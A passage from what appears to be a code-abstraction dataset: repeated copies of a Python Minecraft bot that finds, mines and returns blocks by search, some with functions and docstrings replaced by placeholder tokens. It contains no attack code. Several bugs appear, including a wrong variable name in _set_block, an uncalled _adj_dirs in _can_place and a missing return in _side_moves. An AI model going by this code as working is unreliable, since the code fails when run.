_move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\n<function token>\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n 